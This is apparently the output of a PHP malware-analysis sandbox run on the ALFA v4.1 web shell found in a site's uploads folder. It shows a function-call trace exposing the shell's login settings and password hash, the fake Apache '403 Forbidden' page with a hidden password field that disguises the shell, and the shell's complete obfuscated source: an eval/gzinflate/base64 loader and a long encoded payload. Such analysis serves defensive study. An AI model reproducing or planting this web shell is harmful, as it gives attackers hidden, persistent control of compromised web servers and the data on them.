3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	198	$prefix = 'pa'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	206	GLOBALS['DB_NAME']['pass'] = '7fda3b84fdea259e352fee85c8523239'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	207	GLOBALS['DB_NAME']['pass_rand'] = 'password'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	196	$key = 'safe_mode'
4	35	0	0.055244	3448240	substr	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	198	3	'safe_mode'	0	2
4	35	1	0.055259	3448368
4	35	R			'sa'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	198	$prefix = 'sa'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	211	GLOBALS['DB_NAME']['safemode'] = '1'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	212	GLOBALS['DB_NAME']['safemode_rand'] = 'safe_mode'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	196	$key = 'login_page'
4	36	0	0.055324	3448240	substr	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	198	3	'login_page'	0	2
4	36	1	0.055339	3448368
4	36	R			'lo'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	198	$prefix = 'lo'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	216	GLOBALS['DB_NAME']['login_page'] = '403'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	217	GLOBALS['DB_NAME']['login_page_rand'] = 'login_page'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	196	$key = 'show_icons'
4	37	0	0.055413	3448240	substr	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	198	3	'show_icons'	0	2
4	37	1	0.055428	3448368
4	37	R			'sh'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	198	$prefix = 'sh'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	221	GLOBALS['DB_NAME']['show_icons'] = '1'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	222	GLOBALS['DB_NAME']['show_icons_rand'] = 'show_icons'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	196	$key = 'post_encryption'
4	38	0	0.055491	3448240	substr	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	198	3	'post_encryption'	0	2
4	38	1	0.055506	3448368
4	38	R			'po'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	198	$prefix = 'po'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	226	GLOBALS['DB_NAME']['post_encryption'] = FALSE
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	227	GLOBALS['DB_NAME']['post_encryption_rand'] = 'post_encryption'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	196	$key = 'cgi_api'
4	39	0	0.055571	3448240	substr	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	198	3	'cgi_api'	0	2
4	39	1	0.055586	3448368
4	39	R			'cg'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	198	$prefix = 'cg'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	231	GLOBALS['DB_NAME']['cgi_api'] = TRUE
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	232	GLOBALS['DB_NAME']['cgi_api_rand'] = 'cgi_api'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	240	$userAgents = [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler', 6 => 'bot', 7 => 'spider']
4	40	0	0.055662	3448880	implode	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	240	2	'|'	[0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler', 6 => 'bot', 7 => 'spider']
4	40	1	0.055685	3449040
4	40	R			'Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler|bot|spider'
4	41	0	0.055703	3448976	preg_match	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	240	2	'/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler|bot|spider/i'	'python-requests/2.25.1'
4	41	1	0.055723	3449040
4	41	R			0
4	42	0	0.055758	3448880	define	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	247	2	'__ALFA_VERSION__'	'4.1'
4	42	1	0.055777	3448984
4	42	R			TRUE
4	43	0	0.055793	3448912	define	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	248	2	'__ALFA_UPDATE__'	'2'
4	43	1	0.055814	3449016
4	43	R			TRUE
4	44	0	0.055827	3448944	define	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	249	2	'__ALFA_CODE_NAME__'	'Tesla'
4	44	1	0.055843	3449048
4	44	R			TRUE
4	45	0	0.055855	3448976	define	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	250	2	'__ALFA_DATA_FOLDER__'	'ALFA_DATA'
4	45	1	0.055871	3449080
4	45	R			TRUE
4	46	0	0.055884	3449008	define	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	251	2	'__ALFA_POST_ENCRYPTION__'	FALSE
4	46	1	0.055901	3449112
4	46	R			TRUE
4	47	0	0.055914	3449040	define	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	252	2	'__ALFA_SECRET_KEY__'	''
4	47	1	0.055929	3449144
4	47	R			TRUE
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	253	GLOBALS['__ALFA_COLOR__'] = ['shell_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'header_vars' => '#27979B', 'header_values' => '#67ABDF', 'header_on' => '#00FF00', 'header_off' => '#ff0000', 'header_none' => '#00FF00', 'home_shell' => '#ff0000', 'home_shell:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'back_shell' => '#efbe73', 'back_shell:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'header_pwd' => '#00FF00', 'header_pwd:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'header_drive' => '#00FF00', 'header_drive:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'header_show_all' => '#00FF00', 'disable_functions' => '#ff0000', 'footer_text' => '#27979B', 'menu_options' => '#27979B', 'menu_options:hover' => ['key_color' => '#646464', 'multi_selector' => [...]], 'options_list' => ['key_color' => '#00FF00', 'multi_selector' => [...]], 'options_list:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'options_list_header' => ['key_color' => '#59cc33', 'multi_selector' => [...]], 'options_list_text' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'Alfa+' => ['key_color' => '#06ff0f', 'multi_selector' => [...]], 'hidden_shell_text' => ['key_color' => '#00FF00', 'multi_selector' => [...]], 'hidden_shell_version' => '#ff0000', 'shell_name' => '#FF0000', 'main_row:hover' => ['key_color' => '#646464', 'multi_selector' => [...]], 'main_header' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'main_name' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'main_size' => '#67ABDF', 'main_modify' => '#67ABDF', 'main_owner_group' => '#67ABDF', 'main_green_perm' => '#25ff00', 'main_red_perm' => '#FF0000', 'main_white_perm' => '#FFFFFF', 'beetween_perms' => '#FFFFFF', 'main_actions' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'minimize_editor_background' => ['key_color' => '#0e304a', 'multi_selector' => [...]], 'minimize_editor_text' => ['key_color' => '#f5deb3', 'multi_selector' => [...]], 'editor_border' => ['key_color' => '#0e304a', 'multi_selector' => [...]], 'editor_background' => ['key_color' => 'rgba(0, 1, 23, 0.94)', 'multi_selector' => [...]], 'editor_header_background' => ['key_color' => 'rgba(21, 66, 88, 0.93)', 'multi_selector' => [...]], 'editor_header_text' => ['key_color' => '#00ff7f', 'multi_selector' => [...]], 'editor_header_button' => ['key_color' => '#1d5673', 'multi_selector' => [...]], 'editor_actions' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'editor_file_info_vars' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'editor_file_info_values' => ['key_color' => '#67ABDF', 'multi_selector' => [...]], 'editor_history_header' => ['key_color' => '#14ff07', 'multi_selector' => [...]], 'editor_history_list' => ['key_color' => '#03b3a3', 'multi_selector' => [...]], 'editor_history_selected_file' => ['key_color' => 'rgba(49, 55, 93, 0.77)', 'multi_selector' => [...]], 'editor_history_file:hover' => ['key_color' => '#646464', 'multi_selector' => [...]], 'input_box_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'input_box_text' => ['key_color' => '#999999', 'multi_selector' => [...]], 'input_box:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'select_box_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'select_box_text' => ['key_color' => '#FFFFEE', 'multi_selector' => [...]], 'select_box:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'button_border' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'button:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'outputs_text' => ['key_color' => '#67ABDF', 'multi_selector' => [...]], 'outputs_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'uploader_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'uploader_background' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'uploader_text_right' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'uploader_text_left' => ['key_color' => '#25ff00', 'multi_selector' => [...]], 'uploader:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'uploader_progress_bar' => ['key_color' => '#00ff00', 'multi_selector' => [...]], 'mysql_tables' => '#00FF00', 'mysql_table_count' => '#67ABDF', 'copyright' => '#dfff00', 'scrollbar' => ['key_color' => '#1e82b5', 'multi_selector' => [...]], 'scrollbar_background' => ['key_color' => '#000115', 'multi_selector' => [...]]]
4	48	0	0.056068	3449072	preg_replace	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	579	3	'!\\(\\d+\\)\\s.*!'	''	'/var/www/html/uploads/alfav4-1.php(5) : eval()\'d code(1) : eval()\'d code'
4	48	1	0.056088	3449264
4	48	R			'/var/www/html/uploads/alfav4-1.php'
4	49	0	0.056104	3449168	trim	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	579	1	'/var/www/html/uploads/alfav4-1.php'
4	49	1	0.056119	3449200
4	49	R			'/var/www/html/uploads/alfav4-1.php'
4	50	0	0.056133	3449168	str_replace	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	579	3	'\\'	'/'	'/var/www/html/uploads/alfav4-1.php'
4	50	1	0.056150	3449264
4	50	R			'/var/www/html/uploads/alfav4-1.php'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	579	GLOBALS['__file_path'] = '/var/www/html/uploads/alfav4-1.php'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	580	$config = ['AlfaUser' => 'alfa', 'AlfaPass' => '7fda3b84fdea259e352fee85c8523239', 'AlfaProtectShell' => '1', 'AlfaLoginPage' => '403']
4	51	0	0.056201	3449544	session_write_close	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	582	0
4	51	1	0.056221	3449440
4	51	R			TRUE
4	52	0	0.056235	3449440	ignore_user_abort	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	583	1	TRUE
4	52	1	0.056251	3449504
4	52	R			0
4	53	0	0.056264	3449472	set_time_limit	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	584	1	0
4	53	1	0.056282	3449536
4	53	R			FALSE
4	54	0	0.056295	3449504	ini_set	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	585	2	'memory_limit'	'-1'
4	54	1	0.056311	3449608
4	54	R			'128M'
4	55	0	0.056324	3449504	ini_set	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	586	2	'upload_max_filesize'	'9999m'
4	55	1	0.056340	3449576
4	55	R			FALSE
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	588	$SERVER_SIG = '<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>\n'
3		A						/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	589	$Eform = '<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>'
4	56	0	0.056391	3449504	md5	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	630	1	'7fda3b84fdea259e352fee85c8523239'
4	56	1	0.056407	3449600
4	56	R			'11b542856c39f693d73a4dc4fc8d0e29'
4	57	0	0.056423	3449504	md5	0		/var/www/html/uploads/alfav4-1.php(5) : eval()'d code(1) : eval()'d code	631	1	NULL
4	57	1	0.056437	3449600
4	57	R			'd41d8cd98f00b204e9800998ecf8427e'
			0.056578	3304080
TRACE END   [2023-02-12 21:15:54.348570]


Generated HTML code

<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /alfav4-1.php on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>
<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form></body></html>

Original PHP code

<?php

$tool = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$gzinflate = "=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